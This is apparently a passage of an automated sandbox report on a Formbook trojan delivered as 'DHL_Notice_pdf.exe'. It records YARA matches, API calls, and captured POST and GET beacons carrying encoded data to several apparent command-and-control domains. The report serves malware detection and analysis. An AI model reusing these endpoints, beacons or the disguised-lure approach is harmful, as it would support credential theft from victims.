          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.traindic.top/hpb7/
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com
          Source: explorer.exe, 00000004.00000002.513253496.0000000009297000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.473910844.0000000009297000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.yongleproducts.com/hpb7/
          Source: 146E771M.5.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: 146E771M.5.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: 146E771M.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
          Source: cmmon32.exe, 00000005.00000003.315194802.0000000000449000.00000004.00000020.00020000.00000000.sdmp, 146E771M.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: unknownHTTP traffic detected: POST /hpb7/ HTTP/1.1Host: www.0dhy.xyzConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.0dhy.xyzUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.0dhy.xyz/hpb7/Accept-Language: en-USAccept-Encoding: gzip, deflateData Ascii: bcX3Uv=MpN4BcIXuYXZw41w7wqOuVyOcSvZ0IfYx-pPxZhHbGao~QBcDlvyKQcIxPoFF096qZGSwoYh79QcaBvAaSuxZoMNeSKZhoo45YZCJ9(TkTL56tP4zC7VqkVKkegF0SunbqOIu_FEMoloQWGtM6O7x62PSJTx7EzkT1rxr6crns1RZ0vYaw).
          Source: unknownDNS traffic detected: queries for: www.yongleproducts.com
          Source: C:\Windows\explorer.exeCode function: 4_2_0B73A4E2 getaddrinfo,SleepEx,setsockopt,recv,recv,4_2_0B73A4E2
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=qNzMMFnF92wYqby+PK0Ez7hJYWSZzqH1hiqfKssSJUPL9XRjbsSUYneeVaUFujlDIgVdAeBkPDqj9kdbdEfqEoULBaI9U5csBw== HTTP/1.1Host: www.yongleproducts.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=BrlYCq9+qqzfybZpwXKugHGOc0m4ktDYrdhK4pNzcFj3giICUF3BZQEP3ssdPmgNj5Kg/PdRxbVpWQCkOBnIEYQcZEeIna030A==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.0dhy.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=LsyOeIgM/ET1t5hHa8GhcP6qBeQiLfhDrF81hKHttqb/Il/dsCibnuekbaxwoyPtCZtmftv1iNZwvaen+NIMKLdu8Y9hsRKcKA== HTTP/1.1Host: www.kunimi.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=bTtFiHq0GQrF6aFlJXqsXsYFYYSgPtrX4CJLxcpJGK/F7H1QBurO56xriJCe1rAnTJlhkBPAE1A8g1vh/R7KfM22DyUBSGy/9w==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.traindic.topConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=+QEmeUzOQAV/evbBmcNZRFxNHMmEBYUw3TD399HaSALRcdrdntvE2stvjFfWDoHleQ7kMHGKc1CQfriDp0hgoRSMDh0fNxliSQ== HTTP/1.1Host: www.bohndigitaltech.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?bcX3Uv=Sr1AjUgE1bmYtN0hdeH1+2eYW2bz9zJIy7x8VWFTjEXaDkIuvqWhFoT+O4ddqC6+eWArdJNQDIDq/++CVSPV2yhYsiVz8XiXvw==&xN_j=yFbSaCxwQG4Y-X HTTP/1.1Host: www.rifleroofers.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hpb7/?xN_j=yFbSaCxwQG4Y-X&bcX3Uv=NuHAd+vfjtmC4E+cdz1CpM6J6ScGh9KWfGXGi6oH+281UYUkr6SouFSZ7LMQAOLiSk3FYsgr8Pu9aCQzqq/bHuqb5CQESJqHRQ== HTTP/1.1Host: www.denko-kosan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

          E-Banking Fraud

          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: initial sample Static PE information: Filename: DHL_Notice_pdf.exe
          Source: DHL_Notice_pdf.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 3.2.zkvixbqxp.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273874726.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.274142159.00000000008D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.273942150.0000000000560000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505204819.00000000026C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.505473139.00000000027C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.504397231.0000000000240000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\DHL_Notice_pdf.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: String function: 009FB150 appears 136 times
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: String function: 044EB150 appears 133 times
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E533 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5E3 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E663 NtClose
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E713 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E52E NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_0041E5DD NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A20 NtResumeThread,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395D0 NtClose,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39540 NtReadFile,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A398A0 NtWriteVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39820 NtEnumerateKey
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3B040 NtSuspendThread
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A399D0 NtCreateProcessEx
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39950 NtQueueApcThread
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A80 NtOpenDirectoryObject
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39A10 NtQuerySection
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A3B0 NtGetContextThread
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39B00 NtSetValueKey
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A395F0 NtQueryInformationFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39520 NtWaitForSingleObject
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3AD30 NtSetContextThread
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39560 NtWriteFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A396D0 NtCreateKey
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39610 NtEnumerateValueKey
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39670 NtQueryInformationProcess
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39650 NtQueryValueKey
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39730 NtQueryVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A710 NtOpenProcessToken
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39760 NtOpenProcess
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A39770 NtSetInformationFile
          Source: C:\Users\user\AppData\Local\Temp\zkvixbqxp.exe Code function: 3_2_00A3A770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529540 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529560 NtWriteFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295D0 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529650 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529660 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529610 NtEnumerateValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296D0 NtCreateKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529710 NtQueryInformationToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529FE0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529780 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529840 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529860 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299A0 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A50 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452AD30 NtSetContextThread
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529520 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045295F0 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529670 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A770 NtOpenThread
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529770 NtSetInformationFile
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529760 NtOpenProcess
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452A710 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529730 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045297A0 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_0452B040 NtSuspendThread
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529820 NtEnumerateKey
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298F0 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045298A0 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529950 NtQueueApcThread
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_045299D0 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A10 NtQuerySection
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A00 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 5_2_04529A20 NtResumeThread
